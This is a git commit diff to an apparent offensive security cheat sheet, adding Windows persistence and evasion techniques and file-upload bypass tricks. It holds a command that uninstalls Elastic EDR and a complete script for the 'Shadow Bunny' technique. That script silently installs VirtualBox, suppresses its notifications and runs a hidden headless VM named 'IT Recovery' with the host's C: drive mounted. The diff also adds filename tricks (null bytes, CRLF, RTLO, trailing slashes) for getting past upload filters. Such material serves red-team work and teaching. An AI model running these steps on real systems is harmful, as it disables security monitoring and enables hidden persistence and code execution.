Elastic EDR + VM Persistence

2024-06-25 16:39:02 +00:00 · 2022-03-27 19:50:33 +02:00 · 2022-03-27 19:50:33 +02:00 · 89f0b93d43
commit 89f0b93d43
parent d40e055629
3 changed files with 69 additions and 11 deletions
--- a/Resources/MSSQL
+++ b/Resources/MSSQL
@ -444,6 +444,7 @@ EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';

 ```ps1
 SELECT job_id, [name] FROM msdb.dbo.sysjobs;
+SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id
 Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
 ```

--- a/Resources/Windows
+++ b/Resources/Windows
@ -32,6 +32,7 @@
        * [sethc.exe](#sethc.exe)
    * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
    * [Skeleton Key](#skeleton-key)
+    * [Virtual Machines](#virtual-machines)
 * [Domain](#domain)
    * [Golden Certificate](#golden-certificate)
    * [Golden Ticket](#golden-ticket)
@ -56,6 +57,13 @@ PS> attrib +h mimikatz.exe

 * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
 * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
+* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html)
+    ```ps1
+    cd "C:\Program Files\Elastic\Agent\"
+    PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
+    Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
+    Elastic Agent has been uninstalled.
+    ```

 ### Disable Windows Defender

@ -403,6 +411,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC
 Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
 ```

+
+### Virtual Machines
+
+> Based on the Shadow Bunny technique.
+
+```ps1
+# download virtualbox
+Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe
+
+# perform a silent install and avoid creating desktop and quick launch icons
+VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0
+
+# in \Program Files\Oracle\VirtualBox\VBoxManage.exe
+# Disabling notifications
+.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" 
+
+# Download the Virtual machine disk
+Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd
+
+# Create a new VM
+$vmname = "IT Recovery"
+.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register
+
+# Add a network card in NAT mode
+.\VBoxManage.exe modifyvm $vmname --ioapic on  # required for 64bit
+.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
+.\VBoxManage.exe modifyvm $vmname --nic1 nat
+.\VBoxManage.exe modifyvm $vmname --audio none
+.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
+.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"
+
+# Mount the VHD file
+.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
+.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0
+
+# Start the VM
+.\VBoxManage.exe startvm $vmname –type headless 
+
+
+# optional - adding a shared folder
+# require: VirtualBox Guest Additions
+.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
+# then mount the folder in the VM
+sudo mkdir /mnt/c
+sudo mount -t vboxsf shadow_c /mnt/c
+```
+
+
 ## Domain

 ### User Certificate
@ -464,3 +520,4 @@ kerberos::tgt
 * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
 * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
 * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
+* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
--- a/Files/README.md
+++ b/Files/README.md
@ -1,13 +1,12 @@
 # Upload

-Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
+> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

 ## Summary

 * [Tools](#tools)
 * [Exploits](#exploits)
-    * [Defaults extensions](#defaults-extension)
-    * [Other extensions](#other-extensions)
+    * [Defaults extensions](#defaults-extensions)
    * [Upload tricks](#upload-tricks)
    * [Filename vulnerabilities](#filename-vulnerabilities)
    * [Picture upload with LFI](#picture-upload-with-lfi)
@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at

 - Use double extensions : `.jpg.php`
 - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
 - Null byte (works well against `pathinfo()`)
-    * .php%00.gif
-    * .php\x00.gif
-    * .php%00.png
-    * .php\x00.png
-    * .php%00.jpg
-    * .php\x00.jpg
+    * `.php%00.gif`
+    * `.php\x00.gif`
+    * `.php%00.png`
+    * `.php\x00.png`
+    * `.php%00.jpg`
+    * `.php\x00.jpg`
 - Special characters
    * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
-    * Whitespace characters: `file.php%20`
+    * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
    * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
+    * Slash: `file.php/`, `file.php.\`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
    * `Content-Type : image/gif`
    * `Content-Type : image/png`